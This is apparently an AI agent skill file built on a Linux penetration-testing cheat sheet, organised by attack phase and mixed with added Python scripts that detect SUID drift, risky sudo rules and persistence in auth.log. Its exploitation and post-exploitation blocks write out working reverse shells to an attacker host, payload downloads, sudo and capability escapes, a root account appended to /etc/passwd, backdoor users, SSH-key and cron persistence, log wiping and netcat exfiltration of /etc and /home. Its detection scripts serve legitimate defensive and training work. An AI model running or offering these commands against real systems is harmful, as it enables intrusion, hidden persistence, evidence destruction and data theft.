---
name: linux-pentester-notes
description: Practical Linux command reference for penetration testing including recon, enumeration, exploitation, privilege escalation, and post-exploitation techniques.
triggers:
- how do I perform Linux reconnaissance for pentesting
- show me privilege escalation commands for Linux
- what are common Linux enumeration techniques
- help me with Linux post-exploitation commands
- I need Linux pentesting command examples
- show me how to exploit Linux systems
- what commands should I use for Linux recon
- help with Linux security testing commands
---
# Linux Pentester Notes Skill
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
**Linux-for-a-Pentester** is a curated collection of practical Linux commands and techniques organized by penetration testing phases. This repository serves as a quick reference guide for security professionals conducting assessments, CTF challenges, or security research on Linux systems.
The repository is structured around the standard penetration testing methodology:
- General Commands (survival essentials)
- Reconnaissance (information gathering)
- Enumeration (deep service analysis)
- Exploitation (gaining initial access)
- Privilege Escalation (elevating permissions)
- Post-Exploitation (persistence and lateral movement)
## Installation
This is a reference repository, not an installable tool. Clone it locally for quick access during engagements:
```bash
# Clone the repository
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
# Optional: Create an alias for quick access
echo "alias pentester='cd ~/Linux-for-a-Pentester && ls -la'" >> ~/.bashrc
source ~/.bashrc
```
## Repository Structure
The repository is organized into directories by testing phase:
```
Linux-for-a-Pentester/
├── 00-General-Commands/ # Basic Linux survival commands
├── 01-Recon/ # Reconnaissance techniques
├── 02-Enumeration/ # Service and user enumeration
├── 03-Exploitation/ # Initial access techniques
├── 04-Privilege-Escalation/ # Privilege escalation methods
├── 05-Post-Exploitation/ # Persistence and cleanup
└── Cheatsheets/ # Quick reference one-liners
```
## Key Command Categories
### General Commands (00-General-Commands/)
Essential Linux commands for navigating and understanding target systems:
```bash
# System information
uname -a # Kernel version and architecture
cat /etc/os-release # Distribution information
hostname # Current hostname
uptime # System uptime and load
# File operations
find / -name "*.conf" 2>/dev/null # Find configuration files
grep -r "password" /home 2>/dev/null # Recursive search
locate suid # Locate files quickly
which python python3 # Find binary locations
# Process management
ps aux # All running processes
ps -ef --forest # Process tree view
top # Real-time process monitor
netstat -tulpn # Listening ports (legacy)
ss -tulpn # Listening ports (modern)
```
### Reconnaissance (01-Recon/)
Local and network reconnaissance commands:
```bash
# Network information
ip a # IP addresses and interfaces
ip route # Routing table
arp -a # ARP cache
cat /etc/resolv.conf # DNS configuration
# User enumeration
whoami # Current user
id # User ID and groups
w # Logged in users
last # Login history
cat /etc/passwd # User accounts
cat /etc/group # Group information
# File system reconnaissance
df -h # Disk usage
mount # Mounted filesystems
cat /etc/fstab # Filesystem table
lsblk # Block devices
# Network scanning (if tools available)
ping -c 3 $TARGET_IP
nmap -sn 192.168.1.0/24 # Host discovery
nmap -p- $TARGET_IP # Full port scan
```
### Enumeration (02-Enumeration/)
Deep service and configuration analysis:
```bash
# Service enumeration
systemctl list-units --type=service # Active services
ps aux | grep root # Root processes
crontab -l # User cron jobs
cat /etc/crontab # System cron jobs
ls -la /etc/cron.* # Cron directories
# SUID/SGID files (privilege escalation vectors)
find / -perm -4000 -type f 2>/dev/null # SUID files
find / -perm -2000 -type f 2>/dev/null # SGID files
find / -perm -u=s -type f 2>/dev/null # Alternative SUID search
# Writable files and directories
find / -writable -type d 2>/dev/null # Writable directories
find / -writable -type f 2>/dev/null # Writable files
find /etc -writable 2>/dev/null # Writable config files
# Capabilities (often overlooked)
getcap -r / 2>/dev/null # Files with capabilities
# Environment and configuration
env # Environment variables
cat /etc/environment # System-wide environment
history # Command history
cat ~/.bash_history # User command history
```
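The SUID and capability listings above are only useful if you can tell an expected entry from an unexpected one. The following added example (not part of the original repository) parses the output of the two enumeration commands and reports drift against a baseline: setuid binaries that are not in an allowlist, and binaries carrying a capability that is effectively root. `BASELINE_SUID`, `HIGH_RISK_CAPS` and the sample command output are constructed for the demo; a real baseline must be taken from a known-good image of the same distribution and package set.

```python
import re

# Constructed, illustrative allowlist of setuid binaries expected on a stock
# Debian-style host. An assumption for this demo: derive the real list from a
# known-good image of the same distribution, not from the host being checked.
BASELINE_SUID = {
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/mount", "/usr/bin/umount",
}

# Capabilities that amount to root if granted to a user-controllable binary;
# cap_setuid on an interpreter (the page's python example) is the classic case.
HIGH_RISK_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
}


def suid_drift(find_output, baseline=BASELINE_SUID):
    """Paths printed by `find / -perm -4000 -type f` that are not in the baseline."""
    found = {line.strip() for line in find_output.splitlines() if line.strip()}
    return sorted(found - set(baseline))


def parse_getcap(getcap_output):
    """Map path -> capability string for both `getcap -r /` output styles:
    '/usr/bin/ping cap_net_raw=ep'   (libcap 2.41 and newer)
    '/usr/bin/ping = cap_net_raw+ep' (older libcap)."""
    caps = {}
    for line in getcap_output.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            path, capstr = line.split(" = ", 1)
        else:
            path, _, capstr = line.partition(" ")
        caps[path] = capstr.strip()
    return caps


def cap_names(capstr):
    """'cap_setuid,cap_net_bind_service=eip' -> {'cap_setuid', 'cap_net_bind_service'}"""
    names = re.split(r"[=+]", capstr, maxsplit=1)[0]
    return {n.strip() for n in names.split(",") if n.strip()}


def risky_capabilities(getcap_output):
    """Sorted (path, capability) pairs where a high-risk capability is set."""
    hits = []
    for path, capstr in parse_getcap(getcap_output).items():
        for name in sorted(cap_names(capstr) & HIGH_RISK_CAPS):
            hits.append((path, name))
    return sorted(hits)


# Constructed sample output, in the format the two enumeration commands print.
SAMPLE_FIND = """\
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/python3.11
/usr/local/bin/helper
"""

SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.11 cap_setuid=ep
/usr/sbin/arping = cap_net_raw+ep
"""

if __name__ == "__main__":
    for path in suid_drift(SAMPLE_FIND):
        print(f"unexpected setuid binary: {path}")
    for path, cap in risky_capabilities(SAMPLE_GETCAP):
        print(f"high-risk capability {cap} on {path}")
```

On a live host, feed the script with `find / -perm -4000 -type f 2>/dev/null` and `getcap -r / 2>/dev/null` output; anything it reports is either a finding for the assessment report or a hardening item (remove the bit or capability, or justify it in the baseline).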
### Exploitation (03-Exploitation/)
Techniques for gaining initial access:
```bash
# Reverse shells
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
nc -e /bin/bash $ATTACKER_IP 4444
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Shell stabilization
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Then Ctrl+Z, then:
stty raw -echo; fg
# Press Enter twice
# File upload techniques
# Using wget
wget http://$ATTACKER_IP:8000/payload.sh -O /tmp/payload.sh
# Using curl
curl http://$ATTACKER_IP:8000/payload.sh -o /tmp/payload.sh
# Using nc (if available)
nc $ATTACKER_IP 9999 > /tmp/payload.sh
# On attacker: nc -lvnp 9999 < payload.sh
# Using base64 (for text files/scripts)
echo "base64_encoded_payload" | base64 -d > /tmp/payload.sh
```
### Privilege Escalation (04-Privilege-Escalation/)
Methods to elevate privileges to root:
```bash
# Automated enumeration scripts
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Sudo abuse
sudo -l # Check sudo permissions
# If (ALL) NOPASSWD: /usr/bin/find
sudo find /etc -exec /bin/bash \;
# If (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'
# Kernel exploits (use with caution)
uname -r # Check kernel version
searchsploit linux kernel 4.15 # Find exploits
# Writable /etc/passwd
# If /etc/passwd is writable
openssl passwd -1 -salt salt password123
echo 'newroot:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
su newroot
# Cron job abuse
# If a cron job runs as root and its script is writable
echo 'bash -i >& /dev/tcp/$ATTACKER_IP/5555 0>&1' >> /path/to/cronjob.sh
# Path hijacking
# If sudo command has relative path
echo '/bin/bash' > /tmp/vulnerable_binary
chmod +x /tmp/vulnerable_binary
export PATH=/tmp:$PATH
sudo vulnerable_command
# Capabilities abuse
# If python has cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
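The sudo checks above come down to reading `sudo -l` output and knowing which rules matter. The following added example (not the repository's code) automates that reading from the defender's side: it parses each rule line, records its tags, and flags rules that grant `ALL`, run without a password, allow a binary the page cites as a shell escape, or carry a wildcard in the arguments. `SHELL_ESCAPE_BINARIES` holds only the two binaries the page mentions and is an assumption to be extended from GTFOBins; the sample `sudo -l` text is constructed.

```python
import os
import re

# Binaries the page itself cites as sudo shell escapes. Assumption for the
# demo: populate this from GTFOBins for the binaries actually present.
SHELL_ESCAPE_BINARIES = {"find", "vim"}

# A rule line as `sudo -l` prints it: "(runas) [TAG: ...] cmd[, cmd ...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>\S.*?)\s*$")
# Tag words sudoers allows in front of a command (NOPASSWD:, SETENV:, ...)
TAG_RE = re.compile(r"([A-Z_]+):\s*")


def parse_sudo_rules(sudo_l_output):
    """Return [(runas, set_of_tags, [commands])] for every rule line."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # headers such as "User alice may run ..." are skipped
        rest = m.group("rest")
        tags = set()
        while True:
            t = TAG_RE.match(rest)
            if not t:
                break
            tags.add(t.group(1))
            rest = rest[t.end():]
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        rules.append((m.group("runas").strip(), tags, commands))
    return rules


def audit_sudo_output(sudo_l_output):
    """Return [(runas, command, findings)]; findings is empty for benign rules."""
    results = []
    for runas, tags, commands in parse_sudo_rules(sudo_l_output):
        for cmd in commands:
            program = cmd.split()[0]
            findings = []
            if program == "ALL":
                findings.append("ALL")          # any command at all
            elif os.path.basename(program) in SHELL_ESCAPE_BINARIES:
                findings.append("SHELL_ESCAPE")  # rule is equivalent to a root shell
            if "NOPASSWD" in tags:
                findings.append("NOPASSWD")      # no credential prompt, no second factor
            if "*" in cmd:
                findings.append("WILDCARD")      # argument pattern may match more than intended
            results.append((runas, cmd, findings))
    return results


# Constructed sample in the layout `sudo -l` uses on a Debian-style host.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on web01:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
    (root) /usr/bin/tar -czf /backup/*.tgz /var/www
    (ALL : ALL) ALL
"""

if __name__ == "__main__":
    for runas, cmd, findings in audit_sudo_output(SAMPLE_SUDO_L):
        status = ", ".join(findings) if findings else "ok"
        print(f"({runas}) {cmd}: {status}")
```

Run it against the real `sudo -l` text captured during the engagement; the `SHELL_ESCAPE` and `ALL` findings are the ones to report first, and the fix on the administration side is to narrow the rule to a wrapper script with fixed arguments, or to drop `NOPASSWD`.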
### Post-Exploitation (05-Post-Exploitation/)
Maintaining access and covering tracks:
```bash
# User creation (persistence)
useradd -m -s /bin/bash backdoor
echo 'backdoor:password123' | chpasswd
usermod -aG sudo backdoor # Add to sudo group
# SSH key persistence
mkdir -p /root/.ssh
echo "$ATTACKER_SSH_PUBLIC_KEY" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# Backdoor scripts
cat > /usr/local/bin/.backdoor.sh << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/$ATTACKER_IP/6666 0>&1
EOF
chmod +x /usr/local/bin/.backdoor.sh
# Cron persistence
echo "*/5 * * * * /usr/local/bin/.backdoor.sh" | crontab -
# Log cleanup
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
echo "" > ~/.bash_history
history -c
unset HISTFILE
# Data exfiltration
tar czf - /etc /home | nc $ATTACKER_IP 7777
# On attacker: nc -lvnp 7777 > exfil.tar.gz
```
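Every persistence step in the block above leaves a syslog trace on a Debian-style host: `useradd`, `chpasswd` and `usermod` log to auth.log, `crontab` logs a `REPLACE` line, `CRON` logs each command it runs, and `sshd` logs the key-based root login. The following added example (not the repository's code) is the detection side of that block: a small rule set run over constructed auth.log lines that reports account creation, password change, admin-group membership, crontab replacement, root public-key login, and cron jobs that run hidden or temp-directory scripts. The log lines and host names are constructed; the message formats follow what shadow-utils, cron and OpenSSH emit.

```python
import re

# Standard syslog line: "Mar 14 10:02:11 host prog[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[\w.-]+)(?:\[\d+\])?: (?P<msg>.*)$"
)

# (finding name, pattern applied to the message part); 'detail' is what gets reported
RULES = [
    ("account_created",      re.compile(r"^new user: name=(?P<detail>[^,]+)")),
    ("password_changed",     re.compile(r"password changed for (?P<detail>\S+)")),
    ("added_to_admin_group", re.compile(r"^add '(?P<detail>[^']+)' to (?:shadow )?group '(?:sudo|wheel|admin|root)'")),
    ("crontab_replaced",     re.compile(r"^\((?P<detail>[^)]+)\) REPLACE ")),
    ("root_pubkey_login",    re.compile(r"^Accepted publickey for (?P<detail>root) from")),
]

# "CRON[pid]: (user) CMD (command ...)" plus a path heuristic for the command
CRON_CMD_RE = re.compile(r"^\((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$")
HIDDEN_OR_TMP_RE = re.compile(r"(^|/)\.[^/]+$|^/(tmp|dev/shm|var/tmp)/")


def scan_log(text):
    """Return [(timestamp, finding, detail)] in log order, one per (finding, detail)."""
    findings, seen = [], set()

    def report(ts, name, detail):
        if (name, detail) not in seen:      # usermod logs group and shadow group separately
            seen.add((name, detail))
            findings.append((ts, name, detail))

    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        ts, prog, msg = m.group("ts"), m.group("prog"), m.group("msg")
        for name, pat in RULES:
            r = pat.search(msg)
            if r:
                report(ts, name, r.group("detail"))
        c = CRON_CMD_RE.match(msg)
        if c and prog == "CRON" and HIDDEN_OR_TMP_RE.search(c.group("cmd").split()[0]):
            report(ts, "cron_runs_hidden_or_tmp_script", c.group("cmd"))
    return findings


# Constructed auth.log/syslog excerpt covering the persistence steps above.
SAMPLE_AUTH_LOG = """\
Mar 14 09:58:01 web01 sshd[2100]: Accepted password for alice from 198.51.100.4 port 40122 ssh2
Mar 14 10:02:11 web01 useradd[2211]: new user: name=backdoor, UID=1002, GID=1002, home=/home/backdoor, shell=/bin/bash, from=/dev/pts/1
Mar 14 10:02:12 web01 chpasswd[2214]: pam_unix(chpasswd:chauthtok): password changed for backdoor
Mar 14 10:02:15 web01 usermod[2218]: add 'backdoor' to group 'sudo'
Mar 14 10:02:15 web01 usermod[2218]: add 'backdoor' to shadow group 'sudo'
Mar 14 10:03:40 web01 crontab[2240]: (root) REPLACE (root)
Mar 14 10:04:02 web01 sshd[2260]: Accepted publickey for root from 203.0.113.7 port 51122 ssh2: ED25519 SHA256:REDACTED
Mar 14 10:05:01 web01 CRON[2280]: (root) CMD (/usr/local/bin/.backdoor.sh)
Mar 14 10:05:01 web01 CRON[2281]: (root) CMD (/usr/lib/sysstat/sa1 1 1)
"""

if __name__ == "__main__":
    for ts, name, detail in scan_log(SAMPLE_AUTH_LOG):
        print(f"{ts}  {name:32s} {detail}")
```

The log-cleanup lines in the block above are themselves a signal: an auth.log that suddenly shrinks to a single newline, or a shell history that is empty on an account with recent logins, is worth an alert on its own. The mitigation that defeats local cleanup entirely is shipping these logs off-host as they are written, so the scan runs on the collector's copy rather than on the file the intruder can truncate.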
## Common Patterns
### Pattern 1: Initial Shell to Stable TTY
```bash
# 1. Get initial shell (reverse shell)
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
# 2. Upgrade to TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# 3. Background with Ctrl+Z, then:
stty raw -echo; fg
# 4. Set terminal type
export TERM=xterm-256color
# 5. Adjust rows/columns (optional)
stty rows 38 columns 116
```
### Pattern 2: Full System Enumeration
```bash
# System info
uname -a
cat /etc/os-release
hostname
# Users and groups
cat /etc/passwd
cat /etc/group
id
sudo -l
# Network
ip a
ip route
ss -tulpn
cat /etc/hosts
# Services and processes
ps aux
systemctl list-units --type=service
cat /etc/crontab
crontab -l
# SUID binaries
find / -perm -4000 2>/dev/null
# Writable directories
find / -writable -type d 2>/dev/null | grep -v proc
# Capabilities
getcap -r / 2>/dev/null
```
### Pattern 3: Quick Privesc Check
```bash
# Check sudo rights
sudo -l
# Find SUID binaries (GTFOBins)
find / -perm -4000 -type f 2>/dev/null
# Check writable files in sensitive locations
find /etc /root /home -writable 2>/dev/null
# Check capabilities
getcap -r / 2>/dev/null
# Check kernel version for exploits
uname -r
# Check for passwords in files
grep -r -i "password" /home /var/www /opt 2>/dev/null
```
## Troubleshooting
### Issue: Commands Not Found
Some systems have minimal installations. Check for alternatives:
```bash
# If netstat not available, use ss
ss -tulpn
# If ifconfig not available, use ip
ip a
# If wget not available, use curl
curl -O http://example.com/file
# If python not available, try python3
which python python3 python2
```
### Issue: Permission Denied Errors
Redirect stderr to /dev/null so that "Permission denied" messages from unreadable paths do not clutter the output:
```bash
find / -name "config" 2>/dev/null
grep -r "password" / 2>/dev/null
```
### Issue: Shell Not Stabilizing
Try alternative methods:
```bash
# Method 1: Python
python -c 'import pty; pty.spawn("/bin/bash")'
# Method 2: Script
script /dev/null -c bash
# Method 3: Expect
expect -c 'spawn /bin/bash; interact'
# Method 4: Perl
perl -e 'exec "/bin/bash";'
```
### Issue: No Internet Access on Target
Transfer files using base64 encoding:
```bash
# On attacker:
base64 -w0 tool.sh > tool.b64
# Copy output, then on target:
echo "BASE64_STRING" | base64 -d > tool.sh
chmod +x tool.sh
```
## Integration with Testing Workflows
### Use During Active Engagement
```bash
# Quick reference during testing
cd ~/Linux-for-a-Pentester
grep -r "SUID" .
cat 04-Privilege-Escalation/suid-exploitation.md
```
### Reference for Report Writing
The repository structure mirrors standard penetration testing phases, making it easy to reference during report writing and ensuring comprehensive coverage of testing activities.
### CTF and Lab Practice
Use these commands as a checklist when practicing in:
- HackTheBox machines
- TryHackMe rooms
- OSCP lab machines
- VulnHub VMs
## Best Practices
1. **Always get permission** before testing on systems you don't own
2. **Document everything** during engagements
3. **Test in isolated environments** first
4. **Use automation wisely** but understand what commands do
5. **Clean up after testing** (remove backdoors, restore configs)
6. **Stay updated** with new techniques and CVEs
## Additional Resources
- **GTFOBins**: https://gtfobins.github.io/ (SUID/Sudo abuse)
- **HackTricks**: https://book.hacktricks.xyz/ (Comprehensive pentesting guide)
- **PayloadsAllTheThings**: https://github.com/swisskyrepo/PayloadsAllTheThings
- **PEASS-ng**: https://github.com/carlospolop/PEASS-ng (LinPEAS enumeration)
## Notes for AI Agents
When helping users with Linux penetration testing:
1. **Always emphasize legal and ethical boundaries**
2. **Recommend testing only on authorized systems**
3. **Explain command flags and options** for learning
4. **Suggest multiple approaches** when one may fail
5. **Remind users to document findings** for reporting
6. **Warn about destructive commands** (rm, dd, etc.)
7. **Encourage understanding over memorization**
This repository is a reference guide, not a step-by-step tutorial. Each engagement is unique and requires critical thinking and adaptation.
Creator's repository · aradotso/security-skills